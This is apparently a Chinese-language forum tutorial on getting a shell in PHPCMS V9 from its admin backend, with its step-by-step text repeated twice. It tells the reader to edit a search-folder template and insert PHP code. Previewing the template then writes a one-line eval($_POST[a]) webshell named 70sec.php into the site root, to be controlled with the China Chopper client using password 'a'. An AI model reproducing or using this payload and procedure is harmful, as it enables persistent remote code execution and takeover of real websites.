PHPCMS V9 后台模板拿shell 测试可用
PHPCMS后台拿SHELL的方法,我自己按照网上的方法,测试没通过,所以另外写一篇给大家,
测试环境: Apache/2.2.3 (CentOS)
登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:
然后点击 search 这个文件夹 也可以其他的自己测试,如下图:
选择一个html点击修改 修改前自己备份一下 尽量不要搞破坏!
输入以上内容,一句话密码不能是数字。
复制代码
修改后 提交 再回来 点击可视化 就执行了代码 网站根目录会生成一句话木马 70sec.php 菜刀连接密码 a
测试环境: Apache/2.2.3 (CentOS)
登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:

然后点击 search 这个文件夹 也可以其他的自己测试,如下图:

选择一个html点击修改 修改前自己备份一下 尽量不要搞破坏!

输入以上内容,一句话密码不能是数字。
复制代码
1
2
3
4
5
|
<?
$fp = @fopen("70sec.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[a]);'."\r\n\r\n?".">\r\n");
@fclose($fp);
?>
|
修改后 提交 再回来 点击可视化 就执行了代码 网站根目录会生成一句话木马 70sec.php 菜刀连接密码 a
